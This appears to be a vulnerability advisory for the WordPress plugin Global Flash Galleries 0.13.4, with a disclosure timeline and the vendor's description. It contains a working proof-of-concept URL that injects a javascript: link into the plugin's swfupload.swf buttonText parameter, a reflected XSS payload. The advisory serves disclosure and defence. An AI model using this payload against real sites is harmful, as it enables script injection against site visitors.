wp-plugin : global-flash-galleries

Plugin Details
Plugin Name: wp-plugin : global-flash-galleries
Effected Version : 0.13.4 (and most probably lower version's if any)
Vulnerability : Components with Known Vulnerabilities
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://localhost/wordpress/wp-content/plugins/globalflashgalleries/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%22javascript:alert(1)%22%3EClick+For+XSS%20%3Cfont%20size=%2216%22%3E%3C/a%3E


Disclosure Timeline
Vendor Contacted : 2013-12-09
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number :
Plugin Description :
[| Global Flash Gallery plugin can help you to create fast and perfectly wonderful and unique galleries of great albums, photos, cards and other images. Global Flash Galleries plugin is easy and convenient for use. It's captivating and beautiful to execute in practice. Ready-made harmonic color layouts are offered in this plug-in. It is possible to preview a gallery created from several albums in a convenient mode of slide show (full size) or in thumbnails (streaming tape). It's easy with Global Flash Galleries to create different galleries from numerous grouped albums even if you don't have much experience in it. There are many various and apprehensible settings and styles with which you can easily change the size of images preserving its original proportion and put the required tags. The plug-in navigation is made at the highest levels and has a broad range of demonstration effects which are easy and plain to comprehend. The excellent functional capabilities of the plug-in will help to create a really peculiar and distinctive collection of galleries. Please find in the Screenshots section the short descriptions of every gallery. <a href='http://flash-gallery.com/wordpress-plugin/' title='Wordpress Gallery Plugin Demo'>Demo</a> ]